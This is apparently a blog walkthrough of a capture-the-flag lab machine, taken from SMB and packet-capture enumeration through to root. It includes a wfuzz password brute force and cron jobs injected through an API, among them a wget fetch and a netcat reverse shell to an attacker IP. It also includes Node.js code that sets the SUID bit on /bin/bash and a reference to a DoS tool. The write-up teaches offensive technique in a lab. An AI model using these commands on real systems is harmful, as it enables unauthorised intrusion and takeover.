Complex Attack Types: Sample Scenarios 47

4 months ago 28

BOOK THIS SPACE FOR AD

ARTICLE AD

The upcoming scenario will improve your penetration capabilities and analysis skills in many ways. We will infiltrate the opposing system by manipulating the technologies used by the system.

You may see that the IPs change from time to time, do not care, we will be using different machines as we progress. The entire methodology is the same.

Keep learning without stopping, cyberpunks!

As we always do, let’s first save the values we use most as constants on the shell.

output

You must register the target machine in its local DNS. We will do this using our /etc/hosts file.

output

All these processes increase your speed and prevent complexity.

Let’s move on to the next step.

At this stage, we will discover the target machine and network structure and reveal the structures we can infiltrate using our enumeration capabilities. First we will use the nmap tool: nmap -sV -sC -T4 -A -oN nmap_result.txt --script=vuln -Pn -sS $target_ip

-sV: Version detection. This tells Nmap to determine the version of the services running on open ports.-sC: Script scanning using default scripts. This enables a set of default Nmap scripts to scan for various common vulnerabilities and gather additional information about the target.-T4: Timing template. This option sets the timing of the scan. T4 is aggressive and faster, but it can be more noticeable to IDS/IPS systems.-A: Enables OS detection, version detection, script scanning, and traceroute. This is a comprehensive scan option.-oN nmap_result.txt: Output the results in normal format to the specified file (nmap_result.txt).--script=vuln: Runs Nmap's vulnerability scanning scripts against the target. These scripts check for known vulnerabilities.-Pn: Disables host discovery. Nmap will not try to determine if the host is up before scanning it.-sS: TCP SYN scan. This is a common scan type that is faster and stealthier than a full TCP connect scan.$target_ip: The target IP address you are scanning.

output

As you can see, we have open ports, version information and advisory CVE notes.

22 SSH OpenSSH 7.6p1
80 HTTP Apache HTTPD 2.4.29
139 Netbios-SSN Samba SMBD
3000 pop?
5000 SSL/HTTP Node.js (Expresss)

SSH (Secure Shell):

Port 22: Default port for SSH, used for secure remote login and command execution.OpenSSH 7.6p1: Version of the OpenSSH software suite providing SSH protocol implementation.Usage: Commonly used by system administrators to securely manage servers, transfer files, and execute commands remotely.

HTTP (Hypertext Transfer Protocol):

Port 80: Default port for HTTP, serving web traffic.Apache HTTPD 2.4.29: Version of the Apache HTTP Server, one of the most popular web servers.Usage: Hosts websites and web applications, serving web pages to clients over the HTTP protocol.

NetBIOS-SSN (NetBIOS Session Service):

Port 139: Used by the NetBIOS session service, which allows file and printer sharing over a network.Samba smbd: Daemon that provides SMB/CIFS services, enabling file and print sharing between Unix/Linux and Windows systems.Usage: Facilitates sharing files and printers in a mixed-OS environment.

Port 3000: Commonly used by various applications and development tools. Without more context, it’s unclear what specific service is running on this port in our case. Popular uses include development servers and dashboard interfaces.

SSL/HTTP (Secure Hypertext Transfer Protocol):

Port 5000: Often used by custom applications and development servers.Node.js (Express): Node.js is a JavaScript runtime, and Express is a popular web application framework for Node.js.Usage: Frequently used for running web applications and APIs, particularly in development and staging environments.

As you can see, we can create an attack surface from many points. First, let’s take a look at the application running on HTTP 80 port.

output

There is a standard Apache server page. Let’s check port 5000.

output

You can try to obtain information through the browser. From here you can check the SSL certificate and get additional security details.

output

You can use this command too:

sslscan --show-certificate https://ourtargetsite.thm:5000

output

Every detail is important. In a real scenario, you should note these things.

Now we can move on to the discovery phase of hidden pages and reveal the directories. You can use this command:

gobuster dir -w $wordlist_dir -u http://ourtargetsite.thm --random-agent -e -d -x html,php,sh,js,txtgobuster dir -w $wordlist_dir -u https://ourtargetsite.thm:5000 --random-agent -k -e -d -x html,php,sh,js,txt

output

We have:

index.html
javascript
hidden.html

output

We got a tip… Note that.

In some scenarios, you can obtain developer notes and additional scripts in the page source.

output

We got another tip…

We know that the SMB port is open. SMB stands for Server Message Block, a network file sharing protocol used by Windows for providing shared access to files, printers, and serial ports. It allows applications to read and write to files and to request services from server programs in a networked environment.

We can conduct research on this.

We can create a query using the nmap tool again.

nmap -p 445 --script=smb-enum-shares,smb-enum-users -A $target_ip -Pnnmap -p 139 --script=smb-enum-shares,smb-enum-users -A $target_ip -Pn

output

We have shares now. We learned that we can also gain authority as “anonymous”.

The enum4linux tool for gathering information from SMB shares, such as user accounts and share names. It’s often used in penetration testing:

enum4linux -a $target_ip

output

The outputs here are very valuable, they expand your attack surface. We also learned that we can obtain shares with NULL entries.

Now let’s give an example of another tool:

smbmap -H $target_ip

output

Our results are similar. We can introduce another tool.

smbclient -N -L $target_ip

output

Alternatively, you can get information with the following command:

crackmapexec smb $target_ip -u '' -p '' --shares

output

The “traces” share is very interesting, we should carry out an acquisition operation for it.

We can use:

smbmap -H $target_ip -r traces

output

We have received content information and these may also be potential usernames. Make a note of all this.

You can try this with NULL password too:

smbclient \\\\$target_ip\\traces

output

You can import these files to your system with the SMB commands here.

output

You can get them one by one with the get command. Or you can use a more practical method. Try this:

smbget -R smb://$target_ip/traces

output

Now, we have everything from source. Or you can also mount it. The mount process refers to the method of making a filesystem accessible at a specific point in the directory tree of an operating system. This is a fundamental operation in Unix-like systems (including Linux) and is used to integrate different storage devices or partitions into a unified file system hierarchy.

Do the following steps in order:

mkdir our_mnt
sudo mount -t cifs //$target_ip/traces our_mnt

output

Interestingly, we have network listening packages, namely .pcapng files.

We need to analyze these packages. There are many tools for this. The most well-known is Wireshark or tshark.

First of all, let’s put all of these into a single file and analyze them all at one point. You need to make sure all the files are in the same folder.

output

Use:

editcap -F pcapng ticket_1.pcapng ticket_2.pcapng ticket_3.pcapng ticket_4.pcapng ticket_5.pcapng combined.pcapng

Or:

mergecap -w combined.pcapng ticket_1.pcapng ticket_2.pcapng ticket_3.pcapng ticket_4.pcapng ticket_5.pcapng

output

Now let’s do some basic analysis with tshark.

Display all packets: tshark -r combined.pcapng

output

Display packet summary: tshark -r combined.pcapng -V

output

These details provide you with critical details such as the package quantity and the most used connection types. This way you narrow down the target.

Show packet counts: tshark -r combined.pcapng -q -z io,stat,0

output

Display packets with a specific ğrotocol (e.g., HTTP): tshark -r combined.pcapng -Y http

output

What is dashboard.png? We must analyze this and find the source. Let’s save the filtered packages: tshark -r combined.pcapng -Y “http” -w filtered_packets.pcapng

output

Now, check that.

output

Get the source:

tshark -r filtered_packets.pcapng -Y "http.request" -T fields -e ip.src -e ip.dst -e http.request.full_uri

output

We have obtained the resource.

Now export object by using Wireshark:

output

We have it.

Control it.

output

We may have gotten a new tip. Note this. Now we have a new server target. Let’s update our local DNS record. It is d3v3lopm3nt.motunui.thm

output

Check this new site.

output

This new target seems to be the developer environment. You have to explore the pages again:

gobuster dir -w $wordlist_dir -u http://d3v3lopm3nt.motunui.thm -e -d -x txt,php,sh,html --random-agent

output

Yes, we got something. Visit there.

output

It was a direct redirect and the README file was downloaded. Try this too: curl http://d3v3lopm3nt.motunui.thm/docs/README.md

output

It looks like in-system API documentation.

There is much more detail at /docs. Conduct research. We will use that wordlist for web contents: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

Now try:

gobuster dir -w $wordlist_dir -u http://d3v3lopm3nt.motunui.thm/docs -e -d --random-agent

output

Ops… Nothing found.

But we have a tip about files:

ISSUES.md
ROUTES.md

Get these files.

output

Now we learned the inner workings better… We have another external port and port: api.motunui.thm:3000/v2/

Time for a little trick. Save this in local DNS again.

output

Here there is version information classified as v2. Sometimes you may get an error message or get more instructions by querying the v1 version. It’s time to do this: curl http://api.motunui.thm:3000/v1

output

We are asked to provide route information via API. This is in the evidence we had before. Try /login.

curl http://api.motunui.thm:3000/v1/login

output

A different error and this time it references a user. This is probably the developer lead. It is maui.

Let’s try a brute force with this username. We have many methods for this.

Try this command:

wfuzz -w $wordlist_pass -c -H 'Content-Type: application/json' -d '{"username":"maui","password":"FUZZ"}' --hh 31 -t 50 http://api.motunui.thm:3000/v2/login

Depending on the length of your wordlist, it may take longer to receive a response.

output

We achieved it successfully. We have a new login credential.

maui:island

We need to test if it works:

curl -H 'Content-Type: application/json' -d '{"username":"maui","password":"island"}' -XPOST http://api.motunui.thm:3000/v2/login

output

Interesting… We got that!

{"hash":"aXNsYW5k"}

We need to reveal the identity of the hash we found.

output

We have to try a different approach, let’s change the route name. Pick /jobs.

curl -H 'Content-Type: application/json' -d '{"hash":"aXNsYW5k"}' http://api.motunui.thm:3000/v2/jobs

output

Response is okay, but empty.

Try too:

curl -X GET http://api.motunui.thm:3000/v2/jobs -H "Content-Type: application/json" -d '{"hash":"aXNsYW5k"}'

output

Undefined?

Maybe we need to trigger the other party with a command. You need to have some quick wits here. Could this be a cron definition?

cron is a time-based job scheduler in Unix-like operating systems. Users can schedule jobs (commands or scripts) to run at specific times or intervals. These scheduled jobs are called "cron jobs." The cron daemon is a background process that runs continuously and checks for scheduled jobs to execute.

A typical crontab entry consists of five time-and-date fields followed by the command to be executed:

* * * * * command_to_execute
- - - - -
| | | | |
| | | | +----- day of the week (0 - 7) (Sunday is both 0 and 7)
| | | +------- month (1 - 12)
| | +--------- day of the month (1 - 31)
| +----------- hour (0 - 23)
+------------- minute (0 - 59)

The command we will transmit must have this format.

But we need to find out whether this structure accepts the POST request.

curl -X OPTIONS http://api.motunui.thm:3000/v2/jobs
curl -X POST http://api.motunui.thm:3000/v2/jobs

output

Yes, it is accepted.

Let’s test run our own HTTP server and forward a file to the other side: python3 -m http.server

outpur

Create a test file.

output

We are ready.

Now try:

curl -H 'Content-Type: application/json' -d '{"hash":"aXNsYW5k","job":"* * * * * wget http://10.10.26.35:8000/testfile.txt"}' -X POST http://api.motunui.thm:3000/v2/jobs

output

Wow!

Yes, we were able to transfer a cron task to the other side. Of course, we cannot be sure if the answer to this will come, additional security stages may block the connection to our HTTP server.

In our scenario, this worked.

Now it’s time to get a shell. A reverse shell is initiated from the target machine to the attacker’s machine. Many networks have firewalls that block incoming connections but allow outgoing connections. By initiating the connection from inside the network, the reverse shell can bypass firewall restrictions. After initial exploitation, attackers use reverse shells to maintain access, move laterally within a network, and deploy additional malware.

Let’s determine our payload and transfer its details.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.26.35 11001 >/tmp/f

rm /tmp/f:

This removes any existing file named f in the /tmp directory.rm is the command to remove files or directories.

mkfifo /tmp/f:

mkfifo creates a named pipe (also known as a FIFO special file) named f in the /tmp directory.A named pipe is a method of inter-process communication (IPC) that allows data to be passed between processes.FIFO stands for “First In, First Out.” In computing, it is a method for managing data structures where the first element added is the first one to be removed. It’s like a queue in real-life scenarios, such as people lining up for a service where the person who arrives first is served first. In Unix-like operating systems, a FIFO special file (also known as a named pipe) is a type of inter-process communication (IPC) mechanism. Unlike regular pipes which are anonymous and exist only during the life of the process, named pipes have a presence in the filesystem and can be accessed by unrelated processes.

cat /tmp/f:

This reads from the named pipe /tmp/f.

| /bin/sh -i:

The | (pipe) operator takes the output from the cat /tmp/f command and uses it as input to /bin/sh -i./bin/sh -i starts an interactive shell.

2>&1:

This redirects standard error (2) to standard output (1), so that both stdout and stderr are sent through the pipe.

| nc 10.10.26.35 11001:

The second pipe (|) takes the output from the shell and sends it to nc.nc (netcat) is a networking utility that reads and writes data across network connections using the TCP or UDP protocols.10.10.26.35 is the IP address of the attacker's machine.11001 is the port number on the attacker's machine where nc is listening.

> /tmp/f:

This redirects the output from nc back into the named pipe /tmp/f.

First, put your machine into listening mode via the port you specified. Our is 11001 .

output

Use the following command:

curl -H 'Content-Type: application/json' -d '{"hash":"aXNsYW5k","job":"* * * * * rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.26.35 11001 >/tmp/f"}' -X POST http://api.motunui.thm:3000/v2/jobs

output

Just wait for the target cron to run this.

output

Yes! We are in.

It’s time to take a tour of the system.

Stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo; fg
export TERM=xterm

output

You must collect the information contained within the target.

output

We have a different user. You can try to access it.

output

We need to increase authority. We call it privilege escalation.

Keep researching.

output

We have:

I have started planning the new network design in packet tracer, and since you're 'the best engineer this island has seen', go find it and finish it.

This file talks about the new network design in the packet tracer. Since Cisco packet tracer files have the pkt extension, let’s look for files with the .pkt extension. We have to start from here.

Use this:

find / -type f -iname '*pkt' -ls 2>/dev/null

It may take a long time to get an answer from here.

output

We have a file on /etc/network.pkt

output

To review the file here, you need to install the required elements at the following location: https://www.netacad.com/courses/packet-tracer

output

Or just use https://skillsforall.com/resources/lab-downloads

This is the subject of a separate article, later we can talk about how to use CISCO tools.

When you analyze this file, you will encounter the following findings.

output

You should look at the configurations for switch. When you do this you will get another password for user moana.

Password is H0wF4ri’LLG0.

You should obtain detailed information about the system architecture. Use dpkg --version

output

dpkg is the Debian package management system used on Debian-based Linux distributions, such as Debian itself, Ubuntu, and many others. It is a low-level tool that handles the installation, removal, and querying of .deb packages, which are the binary packages used in these distributions.

The external packages we will download must be according to the system architecture here.

Let’s connect with our new user via SSH.

output

As you can see, we are walking through the system step by step.

Now it’s time to transfer linpeas to the other party. To do this, first download the script to your local location from the following link: https://github.com/peass-ng/PEASS-ng/releases/download/20240721-1e44f951/linpeas_linux_arm64

Or just use it: https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

output

Get your own HTTP server up and running again: python3 -m http.server

Then make a request from the target user to your HTTP server.

output

We got that. Just run it and have it enumerated automatically: bash linpeas.sh

output

This allows you to enumerate the target system and gives you detailed evidence. You must wait patiently.

output

The output is quite long. Examine them all in detail in the real scenario. We can go goal-oriented.

According to the details we received through Linpeas, user moana can edit a .service file.

Let’s investigate these files:

find / -type f -name '*service' -group moana -ls 2>/dev/null

output

We got api.service.

Take a look at the file: cat /etc/systemd/system/api.service

output

We have an user-depented executable file…

[Unit]
Description=The API for Motunui

[Service]
User=www-data
Group=www-data
ExecStart=/usr/bin/node /var/www/api.motunui.thm/server.js
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target

So what happens if we rearrange it and write some code in it?

You should target the following file as NodeJS code:

/var/www/api.motunui.thm/server.js

output

The user www-data has permissions, we have captured this user before.

output

Now it’s time to manipulate the server.js file. You can make the following changes.

First, let’s take this file to our local machine. Sometimes some commands may not work on the target system or you may cause the firewall to issue a warning.

output

You can get it to your local location with the following command:

scp moana@10.10.82.191:server.js /root/server.js

output

We have it. Now manipulate it.

output

Save the file and transfer it to the target again via your own HTTP server.

output

You can wait for a while and check this again with a simple query.

curl -H 'Content-Type: application/json' http://api.motunui.thm:3000/v1/jobs

Now let’s target the same user again: /etc/systemd/system/https.service

output

The www-data user also has authority over this file.

[Unit]
Description=The HTTPS website for Motunui

[Service]
User=root
Group=root
ExecStart=/usr/bin/node /var/www/tls-html/server.js
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target

Now this is the file you need to manipulate: /var/www/tls-html/server.js

Manipulate it as:

Add this:

const { exec } = require("child_process");

exec("chmod 4777 /bin/bash",(error,stdout,stderr) => {
if (error) {
console.log('ERROR: ${error.message}');
return;
}
if (stderr) {
console.log('STDERR: ${stderr}');
return;
}
console.log('STDOUT: ${stdout}');

});

output

Follow the same methods and import this file into the target system.

output

Then obtain a DOS script from: https://github.com/jseidl/GoldenEye

output

You can do this either from your own machine to the other machine or directly within the system itself.

output

In cases of system crashes, you can sometimes gain root access.

Linpeas gave us another interesting finding. We have a key that can crack SSL traffic. Remember PCAP files.

It is on /etc/ssl.txt

You will get these:

CLIENT_RANDOM 432738e149bdfb67ce70ca989045c1f2f7589d688e81c327c57f38e1ed457295 ee0b404dfdb59ecda7e017d417afa
CLIENT_HANDSHAKE_TRAFFIC_SECRET ecd91572d3cead7a6fe73f1427bdf8a91ee98bcf34c52123209d3ca9d4170d77 SERVER_HANDSHAKE_TRAFFIC_SECRET ecd91572d3cead7a6fe73f1427bdf8d8dc43372d57151975
CLIENT_TRAFFIC_SECRET_0 ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f739a

You should transfer these SSL keys via Wireshark and analyze the packet again.

output

Obtain the TCP flow again and observe the differences.

output

We can search for password.

output

Yes! We have a password for root.

root:Pl3aseW0rk

We are root now!

Don’t give up on hacking.

Code for good.

^-^